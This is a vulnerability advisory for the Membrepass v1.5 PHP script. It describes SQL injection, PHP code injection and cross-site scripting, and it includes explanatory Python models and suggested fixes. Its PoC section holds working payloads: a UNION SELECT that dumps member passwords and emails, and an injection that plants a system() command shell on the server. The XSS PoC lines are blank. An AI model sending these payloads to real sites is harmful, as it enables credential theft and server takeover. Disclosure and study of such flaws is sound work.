
Membrepass v1.5 Php code execution, Xss, Sql Injection



==================================================================
 Affected.scr..: Membrepass v1.5
 Advisory.ID...: 09290806
 Type..........: Cross Site Scripting, SQL Injection
                 Php code execution
 Risk.level....: Medium
 Vendor.Status.: Unpatched
 Src.download..: comscripts.com/scripts/php.membrepass.1459.html
 Adv.link......: acid-root.new.fr/advisories/09290806.txt
==================================================================


==[ OVERVIEW
=============
membrepass WITH MESSAGING is a member area with automatic installation.
It runs on FREE, ONLINE and other hosting providers. The script is fully
configurable and your site's colours can be added. You can add or remove
form fields. Email addresses are protected against harvesters (anti-spam).
[Quote from www.comscripts.com, translated from French]


==[ DETAILS
============
Several vulnerabilities have been discovered in Membrepass v1.5.

1) Input passed to the "recherche" parameter of /recherchemembre.php isn't
properly sanitised before being used in a SQL query. This can be exploited
to conduct SQL injection attacks; the PoC below uses a UNION SELECT to read
passwords, email addresses and usernames out of the "membre" table.
Successful exploitation may require that "magic_quotes_gpc" is disabled,
since the payload depends on a literal single quote reaching the query.

2) Input passed to the "aifon" parameter of /include/change.php isn't
properly sanitised before being written to a PHP file with fputs(). Because
that file can then be requested over HTTP (the PoC below requests
/include/variable.php), a value that closes the string literal and appends
PHP statements gives arbitrary PHP code execution, and through system()
command execution, on the web server. Successful exploitation may require
that "register_globals" is enabled and "magic_quotes_gpc" is disabled.

3) Input passed to the "recherche" parameter of /recherchemembre.php and to
the "email" parameter of /test.php isn't properly sanitised before being
returned to the user. This can be exploited to conduct cross-site scripting
attacks. Successful exploitation may require that "register_globals" is
enabled.
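The following is an added example, not part of the advisory or of Membrepass, showing how the UNION payload for the "recherche" parameter in item 1 works, modelled in Python with sqlite3. The query shape (a LIKE search over the "membre" table), the four-column schema and the sample rows are assumptions; the real payload selects 22 columns to match the application's own SELECT, and MySQL's "#" line comment is written as "--" because SQLite has no "#" comment.

```python
import sqlite3

# Constructed sample rows standing in for Membrepass's "membre" table.
SAMPLE_MEMBERS = [
    ("alice", "s3cret", "alice@example.org", "Paris"),
    ("bob", "hunter2", "bob@example.org", "Lyon"),
]

# Same construction as the advisory's payload: close the string literal, UNION in
# the columns we want to read (column 1 = passe, column 3 = email, as in the
# PoC), and comment out the remainder of the original query.
UNION_PAYLOAD = "' UNION SELECT passe, 0, email FROM membre -- "


def make_db():
    """In-memory stand-in for the application's database (assumed schema)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE membre (pseudo TEXT, passe TEXT, email TEXT, ville TEXT)")
    con.executemany("INSERT INTO membre VALUES (?, ?, ?, ?)", SAMPLE_MEMBERS)
    return con


def search_vulnerable(con, recherche):
    """The pattern the advisory describes: the parameter is concatenated into SQL."""
    sql = ("SELECT pseudo, ville, email FROM membre "
           "WHERE pseudo LIKE '%" + recherche + "%'")
    return con.execute(sql).fetchall()


def search_fixed(con, recherche):
    """Bound parameter: the value can only ever be a LIKE pattern, never SQL."""
    sql = "SELECT pseudo, ville, email FROM membre WHERE pseudo LIKE ?"
    return con.execute(sql, ("%" + recherche + "%",)).fetchall()


def leaked_passwords(con):
    """Passwords an attacker reads from the 'pseudo' column of the search output."""
    real = {passe for _, passe, _, _ in SAMPLE_MEMBERS}
    return {row[0] for row in search_vulnerable(con, UNION_PAYLOAD)} & real


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", search_vulnerable(db, UNION_PAYLOAD))
    print("fixed:     ", search_fixed(db, UNION_PAYLOAD))
    print("leaked passwords:", leaked_passwords(db))
```

The vulnerable query returns the real member rows plus one UNIONed row per member whose first column is the password; the bound-parameter version treats the whole payload as a search string and returns nothing. SQLite does not treat backslash as an escape in string literals, so this model does not show the effect of magic_quotes_gpc.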
=0D
==[ POC/EXPLOIT
================
POST /recherchemembre.php DATA recherche=' UNION SELECT passe,0,email,0,0,0,0,0,0,0,0,0,pseudo,0,0,0,0,0,0,0,0,0 FROM membre #
GET /include/change.php DATA ainfo="; $cmd = $_GET['cmd']; system($cmd); exit; // http://.../include/variable.php?cmd=dir
POST /recherchemembre.php DATA recherche=
GET  /test.php            DATA email=

Notes: the parameter is spelled "aifon" in the DETAILS section and "ainfo"
in the PoC above; the advisory does not say which spelling is correct. The
injected code is triggered by the second request in that line, i.e. by
requesting variable.php with the command to run in "cmd" (the advisory's
example is cmd=dir).
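Also an added example, not from the advisory or from the script itself: a Python model of the fputs() bug in item 2, run on the PoC payload, next to a writer that keeps the value inside a PHP string literal. It assumes that change.php writes the value as `$ainfo = "<value>";` into include/variable.php, which the page does not show, and its statement counter is a deliberately minimal scanner for `'`, `"` and `//` rather than a PHP parser.

```python
# Payload from the advisory's PoC (everything after "ainfo=").
PAYLOAD = '"; $cmd = $_GET[\'cmd\']; system($cmd); exit; //'


def write_vulnerable(value):
    """Assumed shape of what change.php writes with fputs(): raw value, double-quoted."""
    return '<?php\n$ainfo = "' + value + '";\n?>'


def php_single_quoted(value):
    """Render value as a PHP single-quoted literal; only backslash and ' are special there."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def write_fixed(value):
    """Hardened writer: the value is escaped, so it can never leave its literal."""
    return "<?php\n$ainfo = " + php_single_quoted(value) + ";\n?>"


def count_statements(php):
    """Count ';' outside string literals and // comments (minimal scanner, not a parser)."""
    state = None          # None, "'", '"' or "//"
    count = 0
    i = 0
    while i < len(php):
        c = php[i]
        if state in ("'", '"'):
            if c == "\\":
                i += 1            # skip the escaped character
            elif c == state:
                state = None
        elif state == "//":
            if c == "\n":
                state = None
        else:
            if c in ("'", '"'):
                state = c
            elif php.startswith("//", i):
                state = "//"
            elif c == ";":
                count += 1
        i += 1
    return count


if __name__ == "__main__":
    for name, writer in (("vulnerable", write_vulnerable), ("fixed", write_fixed)):
        src = writer(PAYLOAD)
        print("--- %s: %d statement(s)\n%s\n" % (name, count_statements(src), src))
```

With the raw write the payload's leading `"` closes the assignment and the file ends up containing four statements, the last three being the attacker's; with the escaping writer the same payload stays inside one assignment. In PHP itself var_export() produces the same single-quoted escaping.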


==[ SOLUTION
=============
No vendor fix is available. Edit the source code so that the parameters
above are properly verified: escape or bind the "recherche" value before it
reaches the SQL query, never write the "aifon" value into executable PHP
unescaped, and HTML-encode both reflected values before output.


==[ TIMELINE
=============
29. Aug. 2006 - Public Disclosure


==[ CONTACT
============
Author: DarkFig
Web...: www.acid-root.new.fr
E-mail: gmdarkfig[*]gmail[*]com (fr/en)
